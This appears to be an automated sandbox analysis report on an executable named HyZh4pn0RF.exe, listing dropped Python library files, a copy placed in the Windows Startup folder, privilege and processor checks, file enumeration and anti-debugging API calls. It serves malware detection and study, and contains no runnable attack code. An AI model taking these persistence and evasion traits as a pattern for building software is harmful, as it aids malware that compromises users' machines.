            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\select.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_x25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Math\_modexp.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_ghash_clmul.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_keccak.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_queue.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA1.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_asyncio.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Protocol\_scrypt.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\select.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_ec_ws.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_BLAKE2b.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Protocol\_scrypt.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA384.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\pywin32_system32\pywintypes312.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD5.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA224.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_ghash_clmul.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_poly1305.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_MD4.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA512.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_RIPEMD160.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA256.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA224.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_ghash_portable.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_cffi_backend.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_lzma.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA384.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_cffi_backend.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_socket.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_socket.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\win32\win32api.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_RIPEMD160.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_uuid.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_uuid.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_MD2.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA256.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA1.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\pyexpat.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_ghash_portable.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_poly1305.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_wmi.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ed25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_lzma.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_ed448.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_wmi.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Math\_modexp.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ed448.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\unicodedata.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\pywin32_system32\pywintypes312.dllJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD4.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ec_ws.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\pyexpat.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_ssl.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_BLAKE2s.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\python312.dllJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\VCRUNTIME140_1.dllJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\win32\win32api.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_ssl.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_ARC4.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_MD5.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_decimal.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD2.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_ed25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17110
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeAPI coverage: 1.8 %
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeAPI coverage: 2.0 %
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F4888D0 FindFirstFileExW,FindClose,0_2_00007FF78F4888D0
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F497E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF78F497E4C
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F497E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF78F497E4C
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F4A1EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF78F4A1EE4
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 9_2_00007FF769337E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,9_2_00007FF769337E4C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 9_2_00007FF7693288D0 FindFirstFileExW,FindClose,9_2_00007FF7693288D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 9_2_00007FF769341EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_00007FF769341EE4
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 9_2_00007FF769337E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,9_2_00007FF769337E4C
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAA591490 GetSystemInfo,2_2_00007FFBAA591490
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: HyZh4pn0RF.exe, 00000000.00000003.1471241194.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
            Source: HyZh4pn0RF.exe, 00000002.00000003.1793434238.000002539A5FB000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1807685273.000002539A627000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1494518029.000002539A604000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1493090352.000002539A610000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1807845266.000002539A62D000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1793898154.000002539A626000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1821768941.000002539A631000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWtrin%SystemRoot%\system32\mswsock.dlld format IP to string (123.45.67.89)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1494518029.000002539A661000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1491643506.000002539A661000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1493090352.000002539A661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F48C57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF78F48C57C
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F4A3AF0 GetProcessHeap,0_2_00007FF78F4A3AF0
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F48C760 SetUnhandledExceptionFilter,0_2_00007FF78F48C760
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F48C57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF78F48C57C
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F48BCE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF78F48BCE0
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F49ABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF78F49ABD8
